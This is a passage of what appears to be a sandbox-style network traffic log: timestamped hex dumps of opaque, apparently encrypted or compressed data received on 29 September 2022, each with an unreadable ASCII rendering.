                                                                                                        2022-09-29 12:46:35 UTC13973INData Raw: 44 57 9f 5e 19 e3 42 4e be 93 99 e0 04 12 ae 37 50 cb b8 7b 91 c8 fc 76 29 0a 34 df fc 7e e6 da fa 2a 14 48 97 72 b2 16 34 3d 18 43 9b 42 64 47 88 d0 51 42 8a d3 81 85 fe 11 68 20 1f 3b 65 77 e9 e9 6a f0 cc 1e 51 8a cd 0d bb 31 f6 46 bc 7e 71 0a b7 dd ad 29 9d dd 2e 86 b5 b9 8d 1b 95 2e fa 1e cd e3 77 37 98 33 85 76 88 0d d3 8c 56 db 18 f4 ab 76 ce 04 68 e3 c9 b1 41 a3 5d 12 86 a1 9b 9f ae ca 2c 2c 57 35 de 95 06 d6 7e b0 d8 49 1d 86 9f 08 e3 bd d6 f8 a7 94 87 40 ba c0 a8 53 02 40 e4 1d 35 4c 68 55 21 24 29 f0 32 7f a4 67 d2 84 59 59 6b 69 d0 eb 56 97 9d 7e 56 3c 9b b9 18 bd 8d 66 58 3f 54 42 ff ff d0 1a 1e 78 3e 17 46 cc 77 f7 82 dc e0 99 1c c0 ae f7 0f 43 43 bf ea 51 ec 92 7a a2 d0 c8 c7 f9 43 34 e2 7d fa 64 c8 30 cd 64 a2 ac 64 22 92 42 f9 c7 96 91 6b
                                                                                                        Data Ascii: DW^BN7P{v)4~*Hr4=CBdGQBh ;ewjQ1F~q)..w73vVvhA],,W5~I@S@5LhU!$)2gYYkiV~V<fX?TBx>FwCCQzC4}d0dd"Bk
                                                                                                        2022-09-29 12:46:35 UTC13989INData Raw: 21 31 4c 33 59 8b 2f 11 4a 2f 86 25 d8 3c 95 ad fc b2 0a fa 9d 7a d7 8e 53 cc 84 60 b2 eb 96 90 b3 42 e3 79 e2 9f be 56 d1 2a de 52 4d 52 c5 e9 1e b4 38 d7 2c de 38 a5 37 64 82 37 7d d9 6f 80 82 3f 60 99 eb 92 5a db 4c 5a 9d 89 06 f5 ba 24 a2 0f e2 5d 44 b9 98 8e c5 c6 df 5a 2d 4c a2 5f 32 fa ed 9d 13 8f 1b 9f f9 e4 30 00 96 c7 96 0f 5d 07 74 2d e9 28 8c 5a 69 e7 9b aa 9b 25 9d f5 ef f3 0b 0b bd ce 16 52 38 3f 74 d0 8b dc da a8 9e 99 11 1c 18 40 49 c1 b5 36 b4 39 27 79 2a a7 4e b1 78 17 45 0b d1 2c 15 f0 c8 42 05 c3 38 92 93 b5 3a 90 33 fe 11 51 40 d7 95 01 97 58 08 48 dc 7e 8d 19 cd 19 c7 3d 30 7f b2 11 b1 30 8c cd e0 bd 6b c2 e9 9e 10 94 29 57 01 ff fe 59 94 01 d3 6a 2f ff b8 d4 43 99 07 ec a6 b8 b0 ef 5a 9f 9a d9 71 46 21 20 98 4b c4 97 72 8b 89 cd 31
                                                                                                        Data Ascii: !1L3Y/J/%<zS`ByV*RMR8,87d7}o?`ZLZ$]DZ-L_20]t-(Zi%R8?t@I69'y*NxE,B8:3Q@XH~=00k)WYj/CZqF! Kr1
                                                                                                        2022-09-29 12:46:35 UTC14005INData Raw: 85 64 d9 7d 46 c8 39 81 93 61 1a 6e 26 70 42 57 b9 2a 7e e6 b1 50 e5 b4 4c ad b9 9e c6 65 00 7e 95 30 4b 07 43 ff 26 b4 37 6f a5 7d af c4 0a 1b 5f 5c 93 60 94 90 67 9c a5 9a 83 27 c9 5b 03 e7 29 31 e2 a9 87 57 50 48 03 ac 88 be 22 78 49 d1 fa 6c 27 6a d2 4a f4 2a ce 16 b1 6a ae 8b 18 40 44 ba fa 32 2c 2d 21 42 90 bf 51 1a 39 09 c6 69 bd 48 50 65 ca c0 c8 46 e1 ec 5e 43 42 82 91 16 f7 d7 c0 80 a9 b4 d4 47 6e f2 63 4f 36 8a 0e 30 6a 0c 58 22 13 a6 c4 3f bc 9a 88 30 8c 12 75 34 c3 6b 66 c4 d5 13 5e 1e 85 10 8b 8d ea 9a d6 9d 57 7d 0b 66 14 f5 6b 60 41 27 c0 ce 9e 26 4f a1 89 7f be 4d b1 bf 7a fc 55 96 db 80 ba 33 d8 bd d8 99 be ee c8 0d 6f df 24 c8 1b 9f a7 a2 0f d6 9c 01 86 4b 76 85 c3 92 c7 c8 dc 2b c9 8c e6 32 c7 1f 99 17 2e ff 13 0e 8e 22 be a2 76 11 c3
                                                                                                        Data Ascii: d}F9an&pBW*~PLe~0KC&7o}_\`g'[)1WPH"xIl'jJ*j@D2,-!BQ9iHPeF^CBGncO60jX"?0u4kf^W}fk`A'&OMzU3o$Kv+2."v
                                                                                                        2022-09-29 12:46:35 UTC14021INData Raw: 8c 7f 77 df 97 47 66 89 5d 43 6a 3e dc eb 63 a4 47 5e 76 c5 3f 51 59 93 db 2e 1d e1 fe 4f cb 55 e5 4a bd dd 80 31 a0 11 ad 3f 8d 6a 53 24 72 05 fa b6 a7 23 aa 02 a1 3a 31 6a b8 72 dd ac 5c d9 b4 6b 68 43 0a 2d ed b4 82 5e 8a 89 1f f2 43 a5 f4 47 43 29 e7 72 7e 5d 89 c5 bb 09 25 02 78 bd 4f 44 06 2a 33 98 1a aa eb ef 14 ef 19 4a 6f 7e 69 5b 16 5a 6e 61 4d 01 0d 3a 76 f9 55 ea 6b b4 45 e3 b8 59 6d 47 63 1f fa 0b 3b 96 0e 52 ad 3d a0 a3 11 f1 84 03 38 36 90 72 07 ff 11 0e 14 e7 a0 e3 15 ac 08 00 9c 9d 15 c9 16 58 b9 9a 63 9d 7c a7 d5 46 08 af a4 9a 91 ef ce 80 26 73 59 f6 21 29 26 90 29 49 69 ff b5 c1 9c ab a7 ce e0 4a 24 84 14 25 a1 c0 cf 91 c3 d5 39 ae 97 a3 6c 61 f2 e0 07 f9 58 00 81 e9 2e 4e d3 e1 86 0b 84 09 f4 5c 4f a6 9b 28 1b 9d 36 c6 4a 1e 34 dd 4a
                                                                                                        Data Ascii: wGf]Cj>cG^v?QY.OUJ1?jS$r#:1jr\khC-^CGC)r~]%xOD*3Jo~i[ZnaM:vUkEYmGc;R=86rXc|F&sY!)&)IiJ$%9laX.N\O(6J4J
                                                                                                        2022-09-29 12:46:35 UTC14037INData Raw: 64 ca 10 ea a8 a4 f5 f6 38 c1 a7 61 96 ed e2 bc e3 66 83 b3 97 7d 3c f1 03 96 dc 21 65 a6 a5 50 69 d9 48 3c a1 83 89 28 1d 33 44 7f a9 76 d0 fb f3 56 25 9a 9b 00 89 1e a1 bc 33 d4 60 09 75 12 82 84 98 30 ce 62 18 f0 97 d3 72 f5 e1 84 e2 74 44 ab 4e 3a 56 93 1a 06 94 04 55 af ce 8a c8 1d 6e 65 c2 ec 0e 55 49 21 01 03 d5 4f 28 83 5b ac 1a ec 63 7f 62 bd 6e 8b cf 45 a7 a1 9e d5 23 e0 78 66 c0 7c cd d4 9b d5 00 38 d6 c6 01 e0 7f 92 81 ea 03 3d c4 ae 51 90 fc cf 63 6e 61 d8 14 a5 7f c6 a9 5a 3c 7f c7 5d d0 65 0a 27 77 fc 4e bc 4c dc 28 35 35 5f cb 5e f0 0c ac 6c a2 02 a8 d7 73 1a 03 e0 86 75 ee a8 53 27 2c 86 52 7f e9 5f 3a ca 09 c7 ea cd 7d 5b 3e b0 d8 c3 fe 9d 7a df 06 5d d3 2d 23 42 d4 ff 59 ae f1 6d 6c 64 88 15 63 e2 ca a5 1e 91 5d bb ee 57 fd 33 6c bd 50
                                                                                                        Data Ascii: d8af}<!ePiH<(3DvV%3`u0brtDN:VUneUI!O([cbnE#xf|8=QcnaZ<]e'wNL(55_^lsuS',R_:}[>z]-#BYmldc]W3lP
                                                                                                        2022-09-29 12:46:35 UTC14053INData Raw: 78 c0 cb 63 9d 79 b9 e8 7d 3b 7d 22 18 e7 81 20 b1 8f 47 0d bc ff 6b c1 81 63 55 a0 8b 6e 97 57 a1 d4 a7 c3 80 2e 8d 15 65 5f 37 da 64 d2 46 e0 44 09 bd 29 25 00 5e 36 cf c0 27 ee 2a 39 84 f3 7f 50 fa f2 ef 54 f1 dd fe df 6b 73 56 6b 63 e5 f9 48 44 7f 57 7e 80 09 fc b2 d2 f9 86 52 92 f4 a7 df d2 87 7b 02 77 e8 e1 6b a7 23 91 ea c9 ab af 83 ba a5 c6 c6 10 f1 fc d5 e0 58 93 ea 63 2d c9 47 5a c3 9a 37 2a ae 33 91 9f e2 ae 57 58 92 5f 7c ca 59 ac e1 5d f7 39 31 78 c4 77 3f 40 41 9d cf ba d6 cd b1 3c 5e 40 83 a0 3c 24 fd 1b 8c 69 ea 95 01 9a bb 80 0f 48 29 46 99 7a 93 50 55 f8 aa 83 54 30 c6 36 ff 81 10 8e 55 74 58 b7 3f 47 98 a8 2f ad 57 63 e4 47 05 e7 54 b6 9e 6b 0e bd 7a 17 2a a8 9c 58 4b cd 8a 59 ff 7a 7a 59 0f ae 10 58 1d 84 dc d2 31 ad 11 a0 50 e6 ec d0
                                                                                                        Data Ascii: xcy};}" GkcUnW.e_7dFD)%^6'*9PTksVkcHDW~R{wk#Xc-GZ7*3WX_|Y]91xw?@A<^@<$iH)FzPUT06UtX?G/WcGTkz*XKYzzYX1P
                                                                                                        2022-09-29 12:46:35 UTC14069INData Raw: aa af a7 85 a5 31 36 95 90 91 89 44 1e 0b fa fb 17 3b 58 9a a4 75 ee 01 28 67 81 0c 82 34 93 ae d4 57 f2 be 18 99 67 02 85 70 59 2e 7a 4e 44 cd 26 17 74 3d 03 77 5a 8f f9 67 49 94 f9 d3 26 31 e2 05 d0 6e 5a fb a3 0e fd 60 3e 31 73 70 55 76 c0 15 50 c6 20 1d 80 6c a2 8d 86 46 5c 23 f8 6c 23 77 95 25 9e 82 16 99 58 08 2a a1 e4 0b 9d 85 e6 85 50 75 91 f8 09 a0 18 f4 34 a0 34 e7 23 b5 c7 61 f8 4f c7 8a d0 d7 a1 18 af 99 7f 3d 09 7c b1 b9 dc a2 1c 72 be 91 85 ed c5 54 be ad 6c d3 f0 e1 9a 54 4c 77 6d e5 b1 bd 5a 7a 28 2e 69 5a 03 39 5c 4d bb 83 3d 00 b0 1e 77 86 31 f4 78 24 2d 87 b1 71 16 5d 2e 93 59 58 0b f5 ed c1 3b 6c ab 79 42 8a ad 00 61 5d 62 8c b1 08 c3 10 a7 f9 96 e1 37 2d 0b d8 35 ef 00 de 41 8e 56 ca 7a ec 10 3b c6 0d 16 52 b6 80 14 8e 7b 59 20 f2 d9
                                                                                                        Data Ascii: 16D;Xu(g4WgpY.zND&t=wZgI&1nZ`>1spUvP lF\#l#w%X*Pu44#aO=|rTlTLwmZz(.iZ9\M=w1x$-q].YX;lyBa]b7-5AVz;R{Y
                                                                                                        2022-09-29 12:46:35 UTC14085INData Raw: da 28 70 57 43 55 2a ba 3f af 19 7a d6 a8 ea b9 0a 0b f9 91 16 31 39 92 56 80 f5 92 aa c9 89 48 02 ce 9d 44 09 41 22 f1 ef f3 4a f3 90 31 b7 af 71 a5 85 eb d6 37 78 33 64 c2 ac b2 82 bd bf 52 dc 63 85 89 b1 ac 50 63 96 24 f9 12 dd 9f a1 c0 3b ee 14 b8 40 8f dd 50 6e 4f 62 e2 a8 f0 d9 71 b0 63 e7 c6 3b 08 17 b0 3d 9c 7c f6 44 ac 8f 28 2b 9e 4b 68 16 13 b0 ce b7 71 fe 73 74 4c d8 8f fb 32 58 24 25 23 28 68 3c 9d 52 91 95 78 4c df 80 44 90 f6 aa 3d 05 39 39 ce a8 41 8f b3 bf 36 bd 52 42 7d f8 c5 b5 3f 70 24 48 39 01 44 bd 5c 08 d5 07 81 52 32 63 8c d8 7a ed f7 99 ff 69 c0 24 d2 aa 23 16 23 4e ca 93 d8 86 d1 25 ae 43 e8 14 9c a8 57 cb 66 16 93 ee f6 cb 5b 63 20 ec e5 98 1e 9a 89 9d d8 b2 09 80 b6 19 6c 72 69 40 22 79 c4 17 17 33 0b d1 ac 04 b9 65 99 a0 0f 74
                                                                                                        Data Ascii: (pWCU*?z19VHDA"J1q7x3dRcPc$;@PnObqc;=|D(+KhqstL2X$%#(h<RxLD=99A6RB}?p$H9D\R2czi$##N%CWf[c lri@"y3et
                                                                                                        2022-09-29 12:46:35 UTC14101INData Raw: 54 ee 36 5c 99 4c 89 71 ba 73 aa 26 a1 8f c9 82 c7 23 05 e7 10 dc 99 46 d6 5c f5 d1 d6 80 5d 68 79 81 37 be 0f c8 0e 40 dc 59 b1 af 03 a1 0b 57 46 06 dc a2 ec 15 75 98 b1 4d dd 4c 53 f2 0b a8 cd 6f 7f db 92 ea 9e 59 5c b5 e2 34 f0 bc 61 4c 10 7b 93 f4 b7 4c b8 e1 ff c0 44 f0 5c 6b a3 01 dd 70 f0 d6 0f 08 46 fa 71 e6 93 8b db a6 9a 51 fd 3d 4d f1 65 fa 81 0a 5d 73 ca b4 1e 45 2f 51 06 a5 20 e8 71 5b af 93 51 0a a3 3f 21 e5 bc d3 52 bd 42 d8 9a 07 88 8b a4 01 6c 6a 68 e7 8f 5f 83 74 d8 fe fb de b0 e5 82 03 50 f6 aa 04 33 1f 52 be cc 9d 22 68 f7 7c 99 bf db 64 23 e2 05 db 89 81 4c 20 db bf 5a 25 84 2c b8 52 4d 29 c2 e0 80 c7 72 ab 18 4d 1c 8c 6e a6 f4 bc 9b 0b 87 da 8d cc c7 12 29 b1 0f 1a a2 e5 4c 19 36 01 95 5b 04 37 d8 2b 82 74 ad 1e 3e ee ff 5e c1 89 bd
                                                                                                        Data Ascii: T6\Lqs&#F\]hy7@YWFuMLSoY\4aL{LD\kpFqQ=Me]sE/Q q[Q?!RBljh_tP3R"h|d#L Z%,RM)rMn)L6[7+t>^
                                                                                                        2022-09-29 12:46:35 UTC14117INData Raw: 3a 3f b2 6f 30 2c d1 96 b2 cb 0c 77 ed 70 54 32 8a 8b e1 ad 6e 8d 72 fb 3a 37 8f d1 35 c2 73 10 97 02 20 db 02 a8 ed 12 95 6a 4a 60 31 90 4b 79 28 d1 28 bc 4e 72 3d 79 79 08 54 dc 89 c6 db 64 64 62 bb 32 b2 ca 56 bd 16 9f 7f 00 a1 b1 fb 66 30 b8 3f 89 b0 a8 bc f0 62 03 96 92 b1 fe 49 8a cc d8 f1 1c 45 43 54 a9 b3 53 85 b2 00 51 b1 be 6b 38 e0 14 cd 1d d0 c6 98 c2 fb ab 0c ce 95 1e 59 5e 38 f6 90 be 92 a7 d6 a8 60 73 23 7f f9 51 53 5f 10 ce dc bc 73 3e ac cd 27 f9 aa 87 c7 15 46 6e 18 d8 00 e1 76 81 d0 84 1e 06 c2 15 db a5 1a 22 09 91 3e e1 83 14 9a d7 62 88 c1 31 05 63 23 2f 84 24 35 93 2b 02 48 0d ed 1d ab 01 b2 df 87 37 9d 17 27 0a 3f 92 65 7e 0c 81 95 cf ac 2c dc 58 af d3 9f 0e bc 63 cc a9 2d 5d b7 6a e5 d3 f3 2b fc 18 8f a8 5d cc 46 c7 0a 4d d8 3b 30
                                                                                                        Data Ascii: :?o0,wpT2nr:75s jJ`1Ky((Nr=yyTddb2Vf0?bIECTSQk8Y^8`s#QS_s>'Fnv">b1c#/$5+H7'?e~,Xc-]j+]FM;0
                                                                                                        2022-09-29 12:46:35 UTC14133INData Raw: 37 f4 4b d1 8c 1a 2f 21 5d f4 57 2f 8e fa 67 91 11 db d1 00 23 10 4b de 30 53 9c 3f c3 c2 08 60 0b 3a 93 28 50 85 92 3c 2e 30 81 67 72 5c f5 c4 6a 62 af 6e 23 e6 2c 1c 13 ec 87 49 22 de 3d 64 7e d0 5a 94 e6 46 6f 82 67 c9 57 bd a9 17 9f e6 f1 15 c3 83 23 6e bc a5 6d 1a fc 37 f0 0b 84 d3 9e 5c 34 f6 24 aa 99 49 91 f8 e8 87 31 a6 73 9c fb f4 ec 6b ab e8 fc 43 45 f5 d4 7c bf b1 da e3 b0 78 3a eb 18 db 31 39 64 31 f0 0e fd 19 99 3f 3f 66 5d f9 87 15 f8 1a b8 ff aa 1f 92 96 c8 7b b0 99 5b e1 66 b4 0c e0 36 77 cc cc 51 c2 d4 ec 9c 23 13 c1 3a 0d c1 86 57 67 86 46 8f ae 3f 76 a1 4e 65 9c 66 59 94 c9 a0 99 7c 22 bf 1f d4 2e 4a a0 95 28 33 b0 4b 32 ef aa 1c b9 16 4e 92 c6 37 07 07 a8 82 32 f7 93 fe 0a b0 64 90 d0 b3 19 81 6a 05 9f fe f0 1e ea 78 4b 43 b9 94 0f ec
                                                                                                        Data Ascii: 7K/!]W/g#K0S?`:(P<.0gr\jbn#,I"=d~ZFogW#nm7\4$I1skCE|x:19d1??f]{[f6wQ#:WgF?vNefY|".J(3K2N72djxKC
                                                                                                        2022-09-29 12:46:35 UTC14149INData Raw: 25 ca 78 91 eb d7 21 21 ad c9 f8 94 c5 d6 ae eb b2 03 60 03 35 30 cc 7f 5f 96 7f 3f 91 08 d7 1f 17 e0 f2 c9 1e 89 b9 1c 4c 50 3f ee c8 f2 91 e0 7c fc e4 80 19 68 03 ab ea d9 b8 b9 0c 45 60 65 24 27 76 03 8b 38 42 89 0f 67 67 66 00 81 7e ff e8 29 81 ba 26 88 79 2a 18 2b d9 b4 87 3e 03 ec db 9c 78 3c 03 5a 8e 46 ca 2f 37 eb ed e1 4e c8 13 70 b2 5a 36 ca a2 19 c2 9f 0f 4f ad f3 c8 8b 17 ba b5 23 57 79 13 89 45 4d ff b4 40 12 be b2 df 78 5d 82 d3 9a 9d 25 1b e3 6a 96 fb 46 de cc 56 8c 01 06 7f ce b3 28 e5 60 3a 8f 21 b1 27 0f 6b d2 01 10 85 7b 1f 16 06 4e e3 5c 16 a0 93 5d 99 f7 65 07 40 4e 1a 8d 22 d3 94 8e d6 f2 d1 48 59 74 d2 96 de f0 f0 4d ca d6 65 47 f9 e7 60 be d7 73 38 8b 27 6b 67 6d 2e 71 48 dc 1a 90 44 bf d8 d5 1f b2 ec 8d 15 bf 60 74 d3 b6 10 5a f1
                                                                                                        Data Ascii: %x!!`50_?LP?|hE`e$'v8Bggf~)&y*+>x<ZF/7NpZ6O#WyEM@x]%jFV(`:!'k{N\]e@N"HYtMeG`s8'kgm.qHD`tZ
                                                                                                        2022-09-29 12:46:35 UTC14165INData Raw: 23 df db f3 cc 3e 1d 4c bc b8 bf a9 e5 1a a1 84 bf 04 b6 75 be cd a8 ef 9b 4a 70 92 1c 6f d8 65 e3 1d 44 f4 35 6c 8c 9b 81 81 d9 7c 22 79 4b 53 12 89 9e 50 e2 88 b5 6f d2 b9 40 1e b8 05 f2 cc 23 28 8a 35 77 25 80 b9 74 61 39 72 89 9f d6 09 b0 e0 11 a3 1b d4 b8 0b 37 fd 9a f1 72 c9 b5 e2 53 7e 9a b1 0e 4d a0 65 9f b9 ac 36 96 69 e9 f5 82 89 0f db 36 c7 76 25 32 0a 6b 46 e2 ab 59 69 90 7c f9 d4 be 9a f2 ee a8 aa c4 7e e7 d7 39 27 fe f4 c6 5b 7b 6c b2 d9 0e 4d 8c 29 36 ac e7 06 b4 84 27 59 68 31 c4 c1 77 50 b7 67 85 b1 f6 3b 48 8d 03 16 9e a8 fa 03 e9 01 4b 0c e8 61 f7 99 87 58 45 fc 39 7e 1d 6f 63 7f 66 20 d0 c6 36 c0 8f 56 fa e2 da c3 ad f3 26 c7 a7 af 80 6f 39 b7 ad 41 ee f7 58 af b9 91 5c 7b dc b5 f1 5c 0e 32 ef 93 f2 3e f7 b9 11 10 42 55 fc 9d 81 41 4e
                                                                                                        Data Ascii: #>LuJpoeD5l|"yKSPo@#(5w%ta9r7rS~Me6i6v%2kFYi|~9'[{lM)6'Yh1wPg;HKaXE9~ocf 6V&o9AX\{\2>BUAN
                                                                                                        2022-09-29 12:46:35 UTC14181INData Raw: 3d fb 2f 66 34 5e 36 f0 0d 49 8e f3 2d 1a 48 18 da 06 2b 3f 5f 7a 8d 7e 3f f2 28 13 1d 53 ce 6b 8e c3 f9 9e 9a 08 22 23 32 55 a1 35 9a 20 d4 de 1c 7a d0 c9 df 07 16 91 80 17 a5 82 d5 7d a2 92 c5 d1 02 cc e9 14 c8 c9 77 e0 65 d0 46 82 42 71 43 00 11 88 0e 20 f7 b8 79 39 70 d3 73 7c e2 0e dd 5d f4 86 b6 45 fa 9b 85 a5 04 3a b2 78 38 da 9b c1 c8 c4 22 23 2c f1 7b 4a 87 48 17 e3 75 83 98 fe 1e b8 26 3e 7b 31 e5 b7 14 e6 b1 5b 1f 9e cf e3 93 4d d6 e7 14 f2 64 27 82 57 33 04 93 76 22 d4 27 57 e2 8a 29 87 ee 2d 3b 0c 39 97 f7 0b 88 99 49 a6 3c d9 dc a8 0c fd 9d 74 22 d7 2f 0a 11 83 cf 9a 53 1c 81 39 96 62 2d e2 1e 18 27 57 dc 59 75 db 37 a1 c6 d5 eb 59 f5 f8 de f0 fb 38 9c c9 92 d9 24 62 e0 3d d2 cc bc 1f 30 5f 74 43 aa fd 53 1e 6f ae 15 4f cf 75 2d 35 68 5a 9d
                                                                                                        Data Ascii: =/f4^6I-H+?_z~?(Sk"#2U5 z}weFBqC y9ps|]E:x8"#,{JHu&>{1[Md'W3v"'W)-;9I<t"/S9b-'WYu7Y8$b=0_tCSoOu-5hZ
                                                                                                        2022-09-29 12:46:35 UTC14197INData Raw: b5 2b 37 3b df a7 50 3c f1 e5 ae be fa 37 08 7a 71 05 9f df 4f f3 e6 99 f6 6a 62 6c 10 0d 6e 04 5f 17 95 fd fa c9 03 63 d2 4a 53 c8 5f 71 56 b8 5d 03 24 ec 2e 1c ee 52 4e f1 50 f7 30 a7 7b 3c 52 66 28 fe ba c9 fe 18 f6 12 f4 cd 28 05 57 3c 50 29 5a 5e f9 2e 7f f8 0d 66 d1 8b b3 20 88 86 1e fc 6c 3e a3 ca 70 a0 60 eb 01 da 5e 85 df ba a1 da 8d b8 2e 01 09 fc 93 80 b6 7c 60 b0 9f af 02 4b 09 76 a2 8b 4b 1a 8f 68 e7 27 bc 63 33 06 33 05 ac b3 5e 74 20 bd bc 0f dd 44 83 b9 02 ef 71 21 fd 46 c2 3b c0 ed bd 2d c9 ca 07 b2 af dd 3b cd fe 8e d7 4d 29 78 b3 ee df d2 1c 68 6e 6d f7 a7 12 b4 ee 3a 6f 51 39 32 f0 a5 f1 86 e8 cf 8e f8 a0 df d7 24 64 71 99 34 42 29 21 35 34 01 81 0b d3 ee c4 4e 39 23 51 03 f6 a7 37 2d ad f8 41 5b dc 72 cb 68 9e e0 19 f6 a3 5d 07 6c 33
                                                                                                        Data Ascii: +7;P<7zqOjbln_cJS_qV]$.RNP0{<Rf((W<P)Z^.f l>p`^.|`KvKh'c33^t Dq!F;-;M)xhnm:oQ92$dq4B)!54N9#Q7-A[rh]l3
                                                                                                        2022-09-29 12:46:35 UTC14213INData Raw: 8d 3f 86 a4 9d a7 99 c1 10 de ba 01 91 5a af 1f 8b 6a e0 89 b8 c0 99 1c 04 f3 38 b8 30 ad 8e 55 c5 38 f4 e0 62 e3 1b 61 78 36 07 32 7c d9 ed 98 9a 71 4d f5 1d 45 7f 3f e1 04 29 62 6d 0c 48 11 45 af 7c f0 3d 07 4d c6 e8 3d 4d 1c 8a f7 b8 35 76 65 aa f5 58 97 2d 9d d2 1a 12 50 e9 60 06 cf ea 0b c0 c0 5b 3f be 5d d9 a5 1c 12 28 ca c6 0d 9b 5b b9 08 4f cf 86 f8 9b 0e 68 c2 21 9c a1 5f 05 b9 c3 ba 2e 82 cb 16 f1 80 76 68 30 e7 5f 13 0d 18 d0 5f c9 99 90 f2 59 13 5b bd 48 09 de 41 0f 7f 8f d0 0f 9f d4 ed 6f 3c a2 64 98 11 c0 69 18 1a 98 37 d5 1c af 6b 83 cd ce cf bc 35 2b 09 8a 03 3b 21 8d 98 cd 1c cd c7 ea 2c 85 5c 78 27 ba 5c 77 43 32 12 2a 9e 35 31 6b ac 20 77 14 57 06 13 ea 46 20 0e 37 86 75 d2 e4 d6 37 9e d2 e0 73 c1 06 3e 76 64 e8 8d 87 c9 f4 5f 49 b1 af
                                                                                                        Data Ascii: ?Zj80U8bax62|qME?)bmHE|=M=M5veX-P`[?]([Oh!_.vh0__Y[HAo<di7k5+;!,\x'\wC2*51k wWF 7u7s>vd_I
                                                                                                        2022-09-29 12:46:35 UTC14229INData Raw: ee 7a 9a 4b b6 b8 19 ff 17 38 b9 e6 bf 9b 73 ca 60 e6 08 55 e1 7b c6 8c 20 60 bd b6 a8 f6 9d f9 ef f2 de 47 8b 5b 74 de d8 81 0b 2e 1f 88 46 f5 34 a4 48 52 a9 e3 88 2d 3b 47 8e c1 6e 73 81 8c cd ca 33 73 60 e5 68 0b 14 54 9b a0 b4 b6 f4 49 e8 77 59 af 59 9b 90 96 11 37 f7 2c aa 6f 63 a7 64 77 19 e6 12 df 46 e4 24 d2 db 6b 60 cb 96 b5 3a 48 43 bb 8e d7 59 a5 0f a5 15 ba ec 5a 25 61 01 a3 6f 7d c9 5d ff 8b 33 af d1 12 d2 cd 05 0a e6 e9 d7 62 ad 72 1b 0f c8 0f 7e 43 1e 31 54 c4 7a 08 35 a0 38 60 a8 9d fb f8 81 0f 7b e0 c0 30 d0 cb 02 14 a0 2b ed a7 db 87 23 cd fa 74 3a 52 87 98 66 37 0a e1 02 04 4d a5 9b 09 48 67 3d ab 0e 68 8d 3e 7f f6 54 b3 23 c6 9f ec 74 8f 54 9e 34 63 af 4e 37 cb 90 4b 4e 80 f0 4b 41 a5 8d 50 c6 a9 9d 2f 8f 32 11 21 64 2a 91 3f c2 90 1b
                                                                                                        Data Ascii: zK8s`U{ `G[t.F4HR-;Gns3s`hTIwYY7,ocdwF$k`:HCYZ%ao}]3br~C1Tz58`{0+#t:Rf7MHg=h>T#tT4cN7KNKAP/2!d*?
                                                                                                        2022-09-29 12:46:35 UTC14245INData Raw: 48 b1 21 21 2c 8f d0 1b 31 24 7d 28 02 1f e3 ac 9f 79 c1 9e 38 e6 24 03 1f 34 57 82 e2 e5 6b c9 45 bd d0 34 da 2e 80 95 a6 bb fd 8b 37 55 d4 2e 6f b3 50 fa b5 78 0f cc e4 a3 29 f3 68 1f 9b 0e 04 42 ac 44 83 35 f6 eb 7c 66 e7 d1 f4 13 07 4b 0a 7f e5 ed 38 16 42 a6 76 e1 d6 15 c3 5e 3b b9 91 85 81 c6 a8 92 2f d7 b1 83 5d 6c 2d 9b ca 5e 4c 86 7d 88 41 10 e2 e2 f4 04 08 f1 64 06 ba 32 33 b4 a6 81 ec a0 9f ad 9e 38 0d 5e 22 cf a4 c2 29 c5 ed c2 f8 ed aa 78 ee 79 51 7c bd 75 e0 62 01 53 e3 83 ed 1f 86 04 4a e0 ee 9f e9 bd b9 ed f5 9f cf 68 c5 b4 ca 40 15 d8 b5 27 06 65 bb bd 46 18 1a ff 14 cb ab a2 49 2e 23 63 89 20 9d fa 51 02 2e 08 51 33 a5 bb 58 b8 81 ce 66 54 1d 74 9c 99 a0 51 b1 a0 3f 98 24 a9 31 a7 0f f7 c8 f7 7a 2d ac 6a fb 9b f6 5c 7f 0f 7e e2 71 01 d0
                                                                                                        Data Ascii: H!!,1$}(y8$4WkE4.7U.oPx)hBD5|fK8Bv^;/]l-^L}Ad238^")xyQ|ubSJh@'eFI.#c Q.Q3XfTtQ?$1z-j\~q
                                                                                                        2022-09-29 12:46:35 UTC14261INData Raw: 36 2c 8d 76 ad d2 bd 8f cd b7 cb fd 2d 23 c1 c5 c3 bc e5 d4 b4 f4 1f b2 56 4d 7d c4 ae f4 b9 5a 39 d7 af 81 bc 77 90 39 24 c2 e4 1d cb ea a7 b1 65 58 8d b7 6a 72 e9 f5 3d c1 7b 14 40 90 14 75 a8 c0 b2 04 ac 33 cc 66 05 3e 81 68 28 4b ea 9c 41 f3 9d 7d c5 90 14 f7 fc 30 1e eb d4 32 ac 6b d2 fb 09 a4 a0 4b 37 53 7e b7 9e a1 0c ed 2c b1 74 0d 7c c2 0f ab fe 3c bd 83 a5 cd 21 c6 d7 5e c1 0f 1b 7b 0f eb a4 09 c6 cd d5 46 16 12 84 47 99 ac f0 3f 9a 8e a6 6e 33 24 5a 5e 37 72 a1 28 9c e3 90 c9 e8 5e 23 28 8c e4 af b0 55 03 d4 87 54 73 54 34 cd 53 b1 3f 77 f8 06 c6 89 08 5a 85 7c ab 58 48 3d b8 05 46 32 43 94 f4 e4 09 c6 bd 5f 14 45 de 8e bd 23 bb 20 c9 63 47 d5 2c ca d5 a5 c1 47 18 b5 c6 76 e6 51 e3 b7 02 f0 c5 bb aa 58 f7 8f 1c bb 85 35 10 8d f6 1d e8 d3 40 f9
                                                                                                        Data Ascii: 6,v-#VM}Z9w9$eXjr={@u3f>h(KA}02kK7S~,t|<!^{FG?n3$Z^7r(^#(UTsT4S?wZ|XH=F2C_E# cG,GvQX5@
                                                                                                        2022-09-29 12:46:35 UTC14277INData Raw: 11 e6 a2 30 56 52 6a 50 f1 fe 4f ee 9a 69 0b 22 a9 34 0f 60 5e 77 3f 85 6b 8a 51 78 8c 55 52 76 53 93 b6 6c 43 40 3d fa a4 72 23 a5 e7 75 d0 6c 0c 32 ea 19 06 ad c3 32 16 63 b4 30 fc 4a 34 6d fa 8d 5e ea 3c 75 af 35 a2 48 2d 87 39 4e 45 e3 88 4d 5f b6 43 3e 47 69 1b b3 2b 65 e9 80 35 cb ea 73 72 6d 9f c5 9e d8 10 4d 6d 88 60 64 09 cb a7 f6 69 bc 9e 14 0e 22 9d 93 a0 1b 4a 58 67 0e b0 17 f4 f8 e6 11 ca 1f 7a d4 9e d9 49 59 19 62 6a f9 4a 4e 21 08 d4 13 4a 27 35 d6 76 2f 6a ba db 23 9c 0e e3 0d 1f 89 55 b1 e6 6e 08 18 8b 71 b4 32 cb b5 70 de d1 54 7c 5e ba ff 18 12 a0 50 74 e8 ac 0d 44 b2 55 d7 